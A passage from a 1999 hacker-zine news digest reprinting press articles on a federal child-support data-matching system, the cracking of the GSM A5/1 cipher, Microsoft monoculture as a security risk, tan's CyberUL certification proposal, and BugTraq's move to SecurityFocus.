      weighed against such successes.
     
      As of 1997, the latest year for which figures are available, more than 7.4 million
      delinquents owed more than $43 billion in past child support. The system has
      helped boost support payments from $12 billion in 1996 to $14.4 billion last year,
      officials said. And in 1997, the burgeoning system helped enforcement programs
      locate more than 1.2 million delinquents.
     
      The system is essentially an electronic dragnet. It collects the names, Social
      Security numbers and other data about every newly hired employee in the nation
      from employers, who also must provide pay reports for most wage-earning adults.
      States ship along the names and other identifying information of people who
      receive state unemployment insurance.
     
      The Administration for Children and Families, a part of the Department of Health
      and Human Services, serves as a sort of clearinghouse that automatically
      matches all of that information against a file of nearly 12 million child support
      cases to locate parents obligated to pay support.
     
      Then the agency provides information about those parents -- no matter whether
      they are behind on payments -- to the appropriate state enforcement workers.
      The idea is to track the parents across state lines.
     
      Supporters of the system note that Congress explicitly restricted access to it.
      Those authorized to use the information include the Social Security
      Administration, which can use the directory of new hires to verify unemployment
      reports; the Treasury Department, which can use it to cross-reference
      tax-deduction claims; and researchers, who gain access only to anonymous
      data.
     
      Next month, financial institutions that operate in multiple states will begin
      comparing a list of more than 3 million known delinquents against their customer
      accounts. Under federal law, the institutions are obligated to return the names,
      Social Security numbers and account details of delinquents they turn up.
     
      The Administration for Children and Families will then forward that financial
      information to the appropriate states. For security reasons, Kharfen said, the
      agency will not mix the financial data with information about new hires, wages
      and the like. Bank account information will be deleted after 90 days.
     
      In a test run this spring, Wells Fargo identified 72,000 customers whom states
      have identified as delinquents. NationsBank found 74,000 alleged delinquents in
      its test.
     
      Civil liberties activists say it would be a mistake to consider the system solely in
      terms of finding bad parents and making them pay up. They worry that the
      network sets a new standard for data surveillance by using computers to
      cross-reference hundreds of millions of personal records about Americans.
     
      Over the past quarter-century, since the Privacy Act was enacted in 1974, the
      federal government has tried to place limits on how its officials could compare
      databases to find or profile people. And in general, the government was supposed
      to limit data collection about people who paid taxes, received a federal benefit,
      served in the military or tangled with the judicial system.
     
      Critics say this new effort leaps beyond those practices by systematically
      creating centralized files about workers, wages and families, and sifting through
      those files to find a relatively small number of suspected deadbeats.
     
      The new registry of child-support cases, for example, now requires the names of
      all parents and children involved, even if they do not receive public assistance or
      ask for help in getting a problem resolved. The registry has information about
      nearly 12 million families.
     
      There is also concern about the government's reliance on private employers and
      financial institutions to watch citizens. A proposal last year to require banks to
      routinely track customer transactions for signs of criminal activity prompted an
      outpouring of protest. Regulators ditched the plan, called Know Your Customer,
      this spring after acknowledging they had misstepped.
     
      Taylor Burke, vice president of Burke & Herbert Bank & Trust Co. in Alexandria,
      Va., said he doesn't believe banks should be asked to watch their customers so
      closely on behalf of the government. ``We're all good citizens. But it doesn't mean
      we spy on our neighbors,'' Burke said. ``It's really scary.''
     
      A review of the swift development of the system has turned up still other
      questions about whether the government paid enough attention to privacy --
      particularly at a time when the issue has become a flash point in public policy
      debates across the country.
     
      As the system was phased in, officials posted federally required notices only in
      the Federal Register. No additional information has been added to W-4 forms that
      people must fill out when taking a new job.
     
      In addition to the issues raised by the GAO about the security of computer
      systems gathering and transmitting personal information, the systems in about a
      dozen states also have not been certified by federal officials as meeting security
      and privacy guidelines.
     
      Officials in OMB and the Administration for Children and Families sought to allay
      fears about mistakes. While acknowledging they have no idea about the likely
      rate of errors because no study was conducted, officials said the program verifies
      the accuracy of any Social Security numbers before sending data along to the
      states.
     
      In addition, officials said, individuals in every state will have an opportunity to
      appeal administrative actions. Virginia, for instance, will give parents up to 10
      days before seizing assets, a state official said.
     
      Critics wonder what might happen to someone who is away on vacation or
      business. ``A Social Security number is not a bullet-proof identifier. There are
      always going to be mistakes,'' said Mary J. Culnan, a business professor at
      Georgetown University's McDonough School of Business, who drew an analogy
      to problems with the accuracy of credit reports in the early 1990s.
     
      Finally, the operation appears to be at odds with the Clinton administration's
      recent push to make privacy a priority. Last month, Clinton called on banks and
      other financial institutions to give consumers more control over how their
      information is gathered and used. ``President Clinton believes that consumers
      deserve notice and choice about the use of their personal information,'' said a
      White House memo about the event.
     
      The assurances of officials do little to assuage the fears of people who worry
      about the potential ills of having a government that closely monitors its citizens.
     
      Such anxieties have been underscored by mistakes child-support enforcement
      workers have made in recent years. Last year, officials in Virginia had to
      apologize to 2,300 parents for misidentifying them as delinquent and announcing
      they would lose their hunting and fishing licenses. Officials attributed the mistake
      to a computer programming error. ``We're not perfect,'' a state official said at the
      time.
     
      California officials also misidentified hundreds of men after they began the federally
      mandated, data-driven crackdown on deadbeats. In some cases, they confused
      men who had similar names.
     
      ``In my estimation, this is going to be nothing more than a huge invasion of
      privacy,'' said James Dean of Oshkosh, Wis., who was unable to get a fishing
      license because he refused to provide his Social Security number.
     
      AP-NY-06-26-99 1916EDT

      @HWA
           

 18.0 GSM Mobile Security is Cracked 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 29th
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      The A5/1 over-the-air voice privacy algorithm used by
      almost all GSM digital phones is no longer secure. A5/1
      is the algorithm used by GSM phones to encrypt
      communications. It is theorized that software to
      decrypt captured conversations will be available within a
      year. The COMP128 algorithm used to authenticate GSM
      phones for network access was cracked last year. 

      The Australian
      http://technology.news.com.au/techno/4221778.htm
      
      GSM mobile security is cracked
      By DAN TEBBUTT
    
      22jun99
    
      DIGITAL mobile phone users could soon face the threat of
      eavesdropping, following a breakthrough reverse engineering effort in
      the United States. 
    
      Three California researchers say they have cloned the secret
      encryption method used to secure Global System for Mobile (GSM)
      communications. 
    
      Research leader Marc Briceno predicted unscrambling software could
      appear before the end of the year, following academic papers studying
      possible faults in the A5/1 over-the-air voice privacy algorithm. 
    
      This standard is used in nearly all digital mobile phones in Australia. 
    
      Inherent flaws in the security technology suggested special cracking
      hardware devices could unscramble GSM conversations within seconds,
      according to Mr Briceno, director of the US-based Smartcard
      Developers Association. 
    
      A network of personal computers could unlock the encryption method
      within a matter of hours. 
    
      "Mobile users should be worried about this," he said. 
    
      "Calls can be intercepted by a moderately motivated adversary who by
      no means needs to be a cryptography expert. 
    
      "The telecommunications providers' promise that GSM is secure with
      respect to random listeners can certainly no longer be maintained." 
    
      The reverse engineering project would allow greater public scrutiny over
      closely guarded GSM security technologies, he said. 
    
      The reference implementation would allow academic cryptographers to
      probe for deficiencies in A5/1. 
    
      "Once the holes are found, any competent programmer can write an
      implementation to exploit those shortcomings." 
    
      Vodafone technical director Jonathan Withers warned against
      over-stating theoretical problems. 
    
      "Practical attacks are pretty hard," he said. 
    
      But Mr Withers confirmed that GSM security standards were watered
      down after concerns were raised by law enforcement agencies. 
    
      "A5/1 is set at a level that is deemed appropriate and acceptable by
      law enforcement," he said. 
    
      Telstra and Optus representatives declined to comment. 
    
      Australian Communications Authority standards and compliance manager
      Grant Symons defended digital security as adequate for the job. 
    
      "The GSM algorithm has proven its worth for people engaged in
      everyday business and social activities. We're not talking about the
      military here," he said. 
    
      Mr Briceno said the synthesised algorithm was so functionally similar to
      the real A5/1 code that it could complete published GSM encryption
      benchmarks. 
    
      Last year he was part of a University of California, Berkeley, team that
      broke the COMP128 algorithm used to authenticate GSM phones for
      network access -- prompting fears of billing fraud on digital mobile
      phones. 
    
      "In a business environment, where people believe their call is secure,
      the cost of eavesdropping could be a lot more than a few dollars on a
      phone bill," Mr Briceno said. 
    
      @HWA
 
 
 19.0 Microsoft Mono-culture Poses National Security Risk 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 29th
      
      From HNN http://www.hackernews.com/
      
        
      contributed by Adam 
      This article asks the right question "Is Microsoft a threat
      to national security?" but misses a few key points. The
      threat is worse than this article says. Remember Melissa
      made it on board a Navy ship and jumped the supposed
      air-gap onto SIPRNet, two things that could not have
      happened if the military was not dependent on one
      company's products. The article talks about a CyberUL
      type of organization, this idea has been around for a
      while and was first proposed by Tan. Oh, and the part
      of a Mac being unhackable, don't believe it. 

      Forbes
      http://www.forbes.com/penenberg/
      
      CyberUL Proposal- By Tan
      http://www.l0pht.com/cyberul.html
      
      HNN Archive for March 31, 1999- Melissa on board 7th Fleet
      http://www.hackernews.com/arch.html?033199#3
            
      HNN Archive for April 5, 1999- Melissa Jumps AirGap onto SIPRNet
      http://www.hackernews.com/arch.html?040599#2
      
      Forbes;
      
      Is Microsoft a threat to national security?

      IN SEPTEMBER 1997, the USS Yorktown, the Navy's first "smart
      ship," was conducting routine maneuvers off Cape Charles, Va.
      Things were fine until the onboard computer system, powered 
      by Microsoft NT software, crashed, leaving the ship dead in 
      the water for 2 hours and 45 minutes. 

      Communications were knocked out. Weapons systems were down.
      The propulsion system wouldn't restart. If you think rebooting
      your laptop after it freezes is a drag, how would you like to 
      try and reboot an entire battle cruiser? 

      Was it sabotage or an
      electromagnetic pulse? Nothing so
      dramatic: The computer was simply asked to divide by
      zero. 

      Officials were quick to exonerate Microsoft for the
      glitch, claiming it was human error, and the Navy
      continues to install Windows NT servers on all its
      cruisers and destroyers, some 84 ships in all.
      Perhaps Navy brass haven't heard the joke making the
      rounds in military computer circles: What does NT
      stand for? Needs towing. 

      The question is, What would have happened if this had
      occurred in battle? 

      Of course, the Navy should modernize its fleet,
      incorporating the best computer technology this
      nation's geeks can create within the fabric of its ships.
      Should the Navy rely on Microsoft products, which
      have proved to be unstable, unreliable, hard to
      troubleshoot and riddled with security holes? It is
      ironic that as one part of the U.S. government goes
      after Microsoft in court, accusing it of monopolistic
      practices, Microsoft is quietly gaining a monopoly over
      another part. 

      Hackers--and now virus makers--have long delighted in
      taunting the "Satan from Redmond," churning out
      software programs that exploit holes in Microsoft
      products. Some of them have deliciously crude
      names, too, like Back Orifice, a software program
      originally created by a group called The Cult of the
      Dead Cow. Because Back Orifice enables a user to
      control and monitor a Windows operating system over
      a network without being detected, it is on just about
      every good hacker's laptop. It is easy to find--type it
      into almost any search engine and you'll encounter
      lists of sites that offer it as a free download. 

      What is particularly distressing is the emergence of
      the Microsoft mono-technology culture, in which its
      many products are tightly bundled together--Windows
      OS plus Microsoft Excel plus Microsoft Word plus
      Microsoft Outlook E-mail could very well equal big
      trouble. As Microsoft's dominance grows, Microsoft
      users become even more vulnerable. 

      Case in point: In March, the Melissa virus swept
      America, spreading when a user opened an attached
      Microsoft Word file. Upon activation, it looked for
      Outlook--Microsoft's E-mail, newsreader and personal
      information manager--created a message, and sent it
      to the first 50 people listed in the user's address book.
      Thankfully, the virus did not destroy or alter data, or
      trash hard drives, but it did flood networks with E-mail.
      This was not true of "Explore.exe," an Internet worm
      named for the file that launches it. In June,
      Explore.exe erased billions of gigs of information
      around the world. 

      Melissa and Explore.exe received wide coverage in the
      media, but you may not have heard of the most recent
      Microsoft security hole in Microsoft's Internet
      Information Server, which, according to eEye Digital
      Security Team, left approximately 90% of 1.3 million
      Microsoft web servers vulnerable to hack attacks. It
      seems that as soon as Microsoft develops a patch to
      combat a new exploit, someone comes up with a new
      one. By the time you read this column, I wouldn't
      doubt that more holes will be identified and plugged. 

      "No one knows what evil lurks in these 40 million lines
      of Windows NT code," says Rick Forno, author of The
      Art of Information Warfare. "You have to roll the dice
      and take your chances." 

      His solution: Buy a Mac. They are virtually
      unhackable, he says. And he's not kidding. 

      But Forno, who truly believes that Microsoft is a threat
      to our nation's security, has other ideas, too. He
      proposes a kind of software version of the Underwriters
      Laboratory, a not-for-profit product safety testing group
      for electronics that has been around since 1894. It is
      responsible for the "UL-approved" stickers you see on
      lamps, Christmas tree lights and clock radios. 

      As for me, I'd like to change the model by which
      software companies peddle their products. Instead of
      allowing them to license software, which lets them
      dodge responsibility for poor quality, software vendors
      should be held liable for glitches that lead to security
      snafus and crashes. If you bought a car with locks on
      the door that didn't work properly, odds are the
      manufacturer would be held liable. So should software
      makers. 

      In addition, the government, and corporations, could
      lessen the impact of the next round of Melissa viruses
      or Explore.exe worms by relying on more than one
      operating system. The less we depend on one type of
      operating system, the less vulnerable we are. 

      Of course, this runs smack into Bill Gates'
      monopolistic vision: to place Windows on every
      computer, PDA, Navy ship and toaster. But Gates is
      only the richest man in the world, not the only
      software vendor in town. 

      And that's how he should be treated. 

      Do you think heavy reliance on Microsoft products
      threatens our national security? Let me know in my
      forum. 

      Related links:
      The Art of Information Warfare 
      http://www.taoiw.org
      
      Underwriters Laboratory 
      http://www.ul.com





      CyberUL Proposal- By Tan
      
      (Reprint)
      
                          Cyberspace Underwriters Laboratories
                                 tan@l0pht.com
                                         
      Cyberspace Underwriters Laboratories - 01/11/1999
      Underwriters Laboratory
      
      Underwriters Laboratories was founded in 1894 by an electrical
      inspector from Boston, William Henry Merrill. In 1893, Chicago
      authorities grew concerned over the public safety due to the
      proliferation of untamed DC circuits and the new, even more dangerous
      technology of AC circuits. These new and little-understood
      technologies threatened our society with frequent fires which caused
      critics to question if the technology could ever be harnessed safely.
      Merrill was called in and set up a one-room laboratory with $350.00 in
      electrical test equipment and published his first report on March 24,
      1894.
      
      Back in Boston, insurance underwriters rejected Merrill's plans for a
      non-biased testing facility for certification of electrical devices.
      Chicago however, embraced the idea. Merrill took advantage of the
      situation in Chicago to get up and running and within months had
      support at the national level.
      
      Today, UL has tested over 12,500 products world-wide and is an
      internationally recognized authority on safety and technology. The UL
      mark of approval has come to provide an earned level of trust between
      customers and manufacturers and safely allowed our society to leverage
      hundreds of inventions that would have otherwise been unfit for public
      use.
      
      While originally targeting inventions which could potentially cause
      physical harm to the user, the UL has expanded into the listing of
      alarm system products as well as alarm system installers. Individual
      products are listed as meeting UL standards and the companies that
      install those products are also listed as qualified to install the
      product as intended. Insurance companies have leveraged the UL's
      scrutiny to properly ascertain their risks.
      
      Cyberspace
      
      Today, technology continues to grow at a rapid pace, perhaps even out
      of control. The commercialization of the Internet has led many
      businesses to offer services out there in what has been called the
      Wild Wild West (WWW). As a result, the public safety is at risk.
      Utilities are bridging control systems to Internet attached
      back-office systems. Banks are offering 'cyber-banking' and merchants
      are collecting information about consumers as they transact their
      business over the Web. Individual privacy and the fiduciary trust
      banks and merchants have established over hundreds of years are open
      to new threats as these activities become more and more prevalent.
      
      Similarly to early electrical inventions, today's computer security
      products may introduce more harm than good when implemented by end
      users. While some of these products do what they claim, most do not.
      The lack of standards and meaningful certification has allowed the
      sale of products that are either intentionally or unintentionally
      snake-oil. While many of the products may solve old problems and
      inadvertently introduce worse ones, some just do not perform as
      advertised at all. For instance, some products have been marketed as
      utilizing the latest and greatest encryption mechanisms when in fact,
      the version they are selling does not utilize any encryption at all.
      
      Just as in the late 1800's, the consumers have little understanding of
      the inventions they are purchasing. They are presented with claims by
      the product's marketers and have no way of proving those claims to be
      true or false. Just as it was back then, this has not stopped the
      large-scale application of these inventions, regardless of public
      safety. In the late 1900's, nobody has stepped up to the plate to
      expand the UL's role into computer security products or to take that
      role as their own. To some extent, groups like Nomad Mobile Research
      Center and L0pht Heavy Industries have acted as modern day Merrills,
      publishing non-biased findings to this effect.
      
      This is not to say that certification of computer security products
      has not been attempted in the past. ICSA for instance, operates a
      certification program for products. CISSP and other organizations also
      offer certification of information security professionals. These
      organizations however, have failed drastically at providing what the
      UL has provided on a more general 'technology' level. These failures
      could be examined in detail but such an exercise is outside the scope
      of this article.
      
      The bottom line for ICSA is that it does not have the rigorous
      standards that the UL has and its credibility has suffered as a
      result. ICSA fails to see the certification process as ongoing or
      cyclical allowing for products to inherit their 'certification'. As a
      result, it is believed by some that there is a problem in that there
      is a lack of non-biased inspection of software and that money buys
      more certifications than good product design and implementation.
      
      CISSP certifies individuals in the computer security industry. While
      sorting out those who are fluent in the industry jargon and concept,
      the work of CISSP's still lacks accountability in that their
      certification is tied to a test rather than what the UL refers to as
      a 'field counter-check'. Like most computer certifications however,
      this is simply a test of test-taking skills rather than a test of
      experience and understanding.
      
      Cyber-UL
      
      Product certification needs to be performed on every version of a
      product. Small changes that could ripple through traditional
      technologies causing safety problems are at least ten fold when
      applied to computer software. Many similarities may be drawn between
      the certification of computer security products and the listing of
      alarm systems and components that UL performs today.
      
      UL has a stringent set of tests which are performed on physical
      security systems which seek UL listing. For instance, safes and vaults
      have a number of different labels which indicate their adherence to
      different standards. UL utilizes 'young hotshot' safe-crackers wishing
      to make a name for themselves, to do the actual testing. This way,
      specialists are motivated (by not only fame but by financial
      compensation as well) to validate the claims that the vendors'
      marketing people want to make. The entire safe and vault business
      operates around these ratings to communicate to the customer what it
      is that the product was designed to do. Based on value and risk, a
      customer may choose to spend more or less on higher or lower rated
      labels.
      
      The two major factors which influence the level of rating are time and
      tools. The 'hotshot' safe-crackers are given samples of the product
      and guidelines for their attempts to defeat its security. For
      instance, a TL-30 rating means that the cracker is limited to tools
      not including torches or explosives and is given 30 minutes of actual
      working time to defeat the security. If X6 is appended to the rating,
      the rating applies to not only the door, but the container (the rest
      of the safe). This aligns the vendor's claims to the actual
      performance of the product. Also, if a new version of the safe comes
      out, it does not inherit the old version's listing, it must be
      re-listed.
      
      This addresses a big problem that was sure to arise with safe vendors
      and has definitely risen in the computer security arena. Customers,
      due to human nature, want products to be certified as 'secure'. Just
      as customers like to hear promises of security, vendors love to make
      them. In 1913, UL tested the first 'security devices'. With this
      expansion into security devices, they recognized the need to replace
      the word 'Approved' with the words 'Inspected' or 'Listed'. Due to
      what UL has established with security devices, customers are not
      lulled into a false sense of security and vendors do not make
      outrageous claims. Customers are presented with 'product x is rated at
      rating y' rather than 'it's ICSA certified'. Vendors claim to be
      resistant to certain toolsets for certain amounts of time. This is not
      what the computer security field looks like today, but is where it
      needs to go. The manufacturer and consumer must realize that testing
      'security' is not the same as testing 'functionality' and because of
      that, claims need to be adjusted to fit reality. If a door-knob opens
      a door, the door works. If a safe-lock opens when you dial the
      combination, it does not mean the safe works. You can however, perform
      tests on the safe to assure that it operates as advertised within
      certain heat and force constraints.
      
      While listing individual devices as meeting UL standards is useful to
      a security professional or consumer, it is only a small part of the
      picture. Installation and configuration of components is critical to
      the actual effectiveness of the security solution. For this reason,
      installation of alarm systems is another area of influence for the UL.
      This may seem like a daunting task since the number of implementations
      is exponential to the number of products. UL has, with only about
      4,000 employees, listed more than 12,500 products in over 40 countries
      and developed over 600 standards for product safety. The tack taken to
      assure the correct installation of alarm systems has been to list
      alarm installation companies. Systems installed by UL listed companies
      may qualify for a UL issued certificate. The certificate registers the
      customer's alarm system, which becomes an eligible candidate for 'field
      counter-checks' (spot-audits) which are performed to assure that
      listed installers are not cutting corners. If a system which has
      received a certificate fails the field counter-check, the installer
      could potentially lose their UL listing. The UL has maintained a
      quality program by scaling the number of field counter-checks as
      needed.
      
      Problems with the model
      
      While the UL model for security devices seems to address many of the
      same issues that surround Cyberspace, there are a number of problems
      with deploying the model for computer security devices as it stands.
      
      The first problem is that if a security system is defeated in the
      physical world, it is typically very obvious to those who come into
      work on Monday and see that the money is gone and the safe is in
      pieces. Detection of a cyber intrusion is typically NOT very obvious
      to those who come into work on Monday. Because of this fact,
      safe-crackers have very limited time to crack a vault. Hackers on the
      other hand, have unlimited time to crack a system. Once they get in,
      safe crackers typically REMOVE items which then become 'missing'.
      Hackers typically COPY items unless their motives are political rather
      than financial, leaving the originals and the system intact. For cyber
      intrusions to become less surreptitious, intrusion detection needs to
      mature and become more widely deployed if 'time' is to be a meaningful
      factor in the process.
      
      The commercial model is based around the storage of valuables,
      particularly jewelry and cash. In addition to the (American) UL
      standards (TL-15, TL-30, TRTL-30, TRTL-15/6, TRTL-30/6, TXTL-60),
      there is a German standard (A,B,C1,C2,D 10, D20, E 10) and a
      Scandinavian standard (60-80, 80-100, 100-120, 120-140, 140-160,
      160-180, 180-200, 200-240, 240-280, 280-320, 320-360). All three are
      based on time and tools. Time and tools is an excellent set of
      criteria for rating computer security components in areas such as
      encryption. In America, the various insurance agencies determine what
      rating is required for them to insure a given amount to be stored in
      the safe or vault. In Europe, the Dutch Safe Rating Committee
      publishes a similar standard assigning a range of financial value to
      each rating in each of the three systems.
      
      This does not, however, address liability for storage of information
      such as credit ratings, social security numbers, bank balances, web
      surfing preferences, political affiliations, which is subject not only
      to theft but to alteration or even just surreptitious access. When
      storing sensitive information, a more appropriate place to look for
      examples is to the government. Classified information presents many of
      the same requirements for storage that sensitive information on the
      public or even commercial interests does.
      
      To meet the U.S. Government's needs in this area, General Services
      Administration (GSA) has published standards (classes 1-8, black, red,
      green and blue labels) which rate storage containers for everything
      from weapons to information processing systems to filing cabinets.
      They additionally publish information on storage of confidential,
      secret, and top-secret materials in GSA Approved (or Non-GSA Approved)
      containers. This information includes additional requirements for
      alarm systems, restricted building access, guard check points, etc...
      Specifics on GSA classes and labels are seemingly difficult to come
      by. Based on the information I have found in the document library of
      locks.nfsec.navy.mil/document_library/guides however, much of what has
      been worked out by the GSA could potentially serve as a foundation for
      developing similar standards for the storage of information on the
      public.
      
      The U.S. Department of Commerce has commissioned the National
      Institute of Standards and Technology (NIST) to maintain FIPS PUB
      140-1, Security Requirements For Cryptographic Modules. The document
      sets forth a standard for specification of cryptographic-based
      security systems protecting unclassified information. It provides for
      product ratings from 1 to 4 with 1 being lame and 4 being k-rad. This
      range is designed to cover a wide range of data sensitivity, from 'low
      value administrative data' to 'million dollar funds transfers' to
      'life protecting data'. The standard is typically utilized for devices
      which protect tokens or encrypt data such as crypto boxes.
      
      While this system may or may not be successful in real life, it
      certainly deserves closer examination in that it represents what may
      be the closest thing that the U.S. Government has to UL for computer
      security products. Under the FIPS 140-1 Testing and Validation model,
      vendors select an accredited FIPS 140-1 testing lab, submit their
      'module' for testing and pay the testing fee. The lab then tests the
      product for conformance to FIPS 140-1 and passes a report on the
      'module' to NIST/CSE for validation. Throughout this process, the lab
      may submit questions for guidance and clarification to NIST/CSE. If
      the report is favorable, a validation certificate is issued by
      NIST/CSE for the 'module'. The certificate is presented to the vendor
      through the lab and the 'module' is added to the published list of
      Validated FIPS 140-1 Modules.
      
      The problem may stem from the difference between UL's roots and those
      of ICSA and CISSP. It certainly manifested itself in the fact that the
      UL is the only one providing non-biased product inspections as well as
      accountability for the quality of the installations out there in the
      field. Requirements for the use of 'listed' intrusion detection
      systems, encryption mechanisms, and companies could on its own make an
      impact if that listing actually meant something. The use of strict
      procedures and specific levels of physical security could be required
      as in the GSA model and this too could help the private sector. This
      has not been the tack taken to date, however.
      
      The second problem is that manufacturers of physical security devices
      are pressured by customers to have a UL listing. This is because
      customers are pressured by insurance underwriters to use products that
      meet UL specifications. In Cyberspace, businesses currently feel that
      the embarrassment and loss of public trust are more costly than the
      actual damage caused by hackers. Citibank has become the most
      well-known example of what happens when computer intrusions are made
      public knowledge. By taking commendable actions and not covering up
      the intrusion, Citibank is now known as the bank that got hacked
      instead of the bank that handled the situation appropriately. Since
      silence seems to be the best policy, cyber merchants choose to 'eat'
      their losses rather than risk the negative publicity. Until these
      losses become intolerable and insurance is necessary, there may be no
      motivation to drive the certification, approval or listing of products
      by UL or any similar organization.
      
      It took UL about 30 years from being subsidized by the insurance
      agencies to being self-supporting off fees paid by manufacturers for
      testing. Merrill was the first full-time employee as a result of this
      change. Insurance underwriters and Consumer Product Safety Commission
      were instrumental in gaining public acceptance of UL work. It was the
      public's safety that was of concern and liability drove companies to
      insure. Insurance underwriters found they were then saddled with the
      problem and addressed it effectively with the UL. Perhaps at some
      point the collection and storage of information on the public will
      carry some sort of liability with it.
      
      A Call for Action
      
      Without a call for action, I would simply be a whiner. At this point,
      you the reader can assist with very little effort. Whether you are a
      vendor, insurance company, end user, or hacker, let me know your
      thoughts on the state of the industry, the state of the UL and/or this
      article's conclusions. As a hacker, is the relationship between the
      hot-shot safe crackers and the UL an attractive one you would be
      interested in? Is the UL listing process for installations sufficient?
      Will it encounter problems unforeseen by this article? As an insurer,
      am I missing part of the picture; are companies actually insuring
      their computer systems and data to mitigate loss or liability? As a
      manufacturer do you foresee problems with the UL model being imposed
      on computer security products? As an end user do you feel that
      computer security is important? Do you feel that the current system
      actually is sufficient? Have you been wanting something better or do
      you feel that you are being slighted by my insinuation that you do not
      fully understand the products you purchase? Any and all feedback on
      this article would be appreciated no matter where it comes from
      (although manufacturer comments will be taken with a grain of salt).
      Forward those comments to tan@l0pht.com. If there is enough feedback,
      I may write a follow up article on this topic. I am considering going
      into detail on each rating system UL, German, Scandinavian, GSA and
      FIPS 140-1, highlighting overlaps with the computer security
      discipline.
      
      Thanks to the UL for providing documentation on the history of the UL
      and directing me to Peter Tallman of the Melville, N.Y. office. Thanks
      to Peter Tallman for clarifying some of the issues surrounding the
      listing of safes and alarm systems and directing me to Beverly
      Borowski whom I hope can assist me in my future research. Also of use
      to date was FED-STD-809, the federal standard for neutralization and
      repair of GSA approved containers as well as a yearly publication by
      the Dutch Safe Rating Committee called 'Recommendations for Insuring
      Money in Safes and Strongrooms'. GSA's web site (www.gsa.gov) provides
      a searchable index of federal standards including FED-STD-809. The
      Dutch Safe Rating Committee is at Stichting Kwaliteitsbeoordeling
      Brandkasten (SKB), P.O. Box 85764, 2508 CL The Hague, The Netherlands
      - Tel. 070-3912008. Additional thanks to the researchers at the L0pht
      for their assistance, particularly to Brian Oblivion for providing
      extensive documentation on FIPS 140-1.
   
      @HWA
      
      
 20.0 BugTraq Moves To SecurityFocus 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      June 29th
      
      From HNN http://www.hackernews.com/
      
      contributed by Aleph One 
      BUGTRAQ, the premier security mailing list, will officially
      be moving from its current home at Netspace.org to
      Securityfocus.com on July 5th. Security Focus will be a
      major security web site featuring complete BugTraq
      archives, Daily News, vulnerability information and lots
      lots more. 

      Security-Focus
      http://www.securityfocus.com
      
      InfoWorld
      http://www.infoworld.com/articles/op/xml/990628opswatch.xml
      
      
             Security Watch | Stuart McClure and Joel Scambray

      Portals open on security landscape
       
      AS SECURITY GROWS into a major concern for IT shops, a number of online security portals have
      sprouted up. These offer nearly everything you'll need to manage security at your site. A number of
      Web pages have begun in the last couple of months, but the most impressive ones are just now
      opening. We have frequented many in our security travels, and we think that Securityfocus.com, a site
      debuting the week of June 26, looks the most promising for providing comprehensive and one-stop
      security information.
       
      Since we started Security Watch more than a year ago, we've seen our column's name borrowed by a
      number of people. Now you'll have to add Securitywatch.com, in Belgium, to that list
      (www.securitywatch.com). According to its semiveiled Web page, the site will debut July 5 and will
      offer the usual security news, products, trends, jobs, literature, and links. But, like Securityfocus.com,
      Securitywatch.com also promises a vulnerability database. The depth and breadth of its vulnerability
      archive remains to be seen, however, as we have yet to receive an offer to preview this site (surprise,
      surprise).
       
      One of the earliest collections of security resources on the Internet came from SecuriTeam.com. The
      site has been available for more than a few months and offers security news, reviews, exploits, and
      tools. Although its content isn't as complete or as well organized as that of some others, it offers a
      decent set of security resources and timely vulnerabilities that we have frequented and highly
      recommend checking out.
       
      SecurityPortal.com has been around for a number of months and offers a fairly good set of security
      content including a weekly column, security news, discussion forums, services, a research center
      (links and resources), and even an online store. It also offers a centralized location to search for
      computer security jobs at all the major career sites, including Career Builder, Career Mosaic, and
      Monster Board.
       
      SecureZone.com is a relative newcomer and at first glance looks much like a general search engine.
      The site offers a variety of security information and resources, and even allows you to add your URL
      to its site. But unlike Securityfocus.com and Securitywatch.com, SecureZone does not offer its own
      vulnerability database. Also, we experienced delays when using the site; be prepared for a wait. The
      site is run by En Garde Systems (www.engarde.com), the product vendor that offers the nifty security
      software T-Sight and IP-Watcher.
       
      The heavy hitter
       
      Combine the Bugtraq archive (www.geek-girl.com), Packet Storm's exploits and tools
      (www.genocide2600.com/~tattooman), and Hacker News Network's timely news
      (www.hackernews.com), and you'll barely scratch the surface of the content provided on
      Securityfocus.com (www.securityfocus.com). The new Web site should be up this week and will offer
      one of the best collections of security resources available on the Internet. We got a sneak peek at this
      site and were duly impressed.
       
      For starters, Securityfocus.com offers one of the most up-to-date security news sections available.
      Also included on the site are security tools, products, books, an events calendar, and forums. But
      unlike many of its competitors, Securityfocus.com offers a robust -- and free -- vulnerability
      database. The site also lets you query for only the technology that's important to you. For example, if
      you're primarily a Solaris 2.51 shop running Netscape Enterprise Server, you can query only the
      relevant vulnerabilities. You can personalize the entire Web site by selecting the type of news,
      calendar events, products, tools, and vulnerabilities you care about. Securityfocus.com will also
      provide a free applet for your desktop that will warn you as soon as a relevant vulnerability is released.
       
      Securityfocus.com is the brainchild of the original Secure Networks group. The team created the
      Ballista security scanner product (now named CyberCop Scanner from Network Associates) and has
      discovered numerous product vulnerabilities on its own. Aleph One, the moderator and caretaker of
      the Bugtraq mailing list (one of the most widely subscribed computer lists in the world), has added his
      muscle to the site in offering the entire Bugtraq archive as part of the vulnerability database. Also, the
      entire Bugtraq mailing list will be moved to Securityfocus.com so archives can be searched. 
       
      After witnessing the birth of so many security portals on the Internet during the past year, we can't
      help but wonder what's next for the security community. Personally, we wouldn't mind seeing the
      paging service that warns administrators about new vulnerabilities the minute they become public, or
      maybe the downloading of daily security news to your Pilot with AvantGo (www.avantgo.com). In any
      case, the future is definitely bright for security professionals. Check out these portals and let us know
      which ones you'll be visiting at security_watch@infoworld.com.
       


      Stuart McClure is a senior manager and Joel Scambray is a manager at Ernst & Young's
      eSecurity Solutions group. They have managed information security in academic, corporate, and
      government environment 
                 
      
      @HWA
      
      
      
 21.0 MS Gives Out Pirate Dough 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~

      June 29th
      
      From HNN http://www.hackernews.com/
      

      contributed by Code Kid 
      Microsoft is planning to give away up to $25 million over
      the next five years, or half of its proceeds from its
      antipiracy efforts, toward technology access and
      education projects around the world. MS estimates that
      it will receive approx. $10 million in civil and criminal
      antipiracy proceeds annually over the next five years. 

      Wired      
      http://www.wired.com/news/news/business/story/20469.html
      
      
      Microsoft Shares Piracy Loot
      Reuters 

      3:00 a.m.  29.Jun.99.PDT
      Microsoft plans to give away half its
      proceeds from efforts to crack down on
      software piracy, or at least US$25 million
      over the next five years, a company
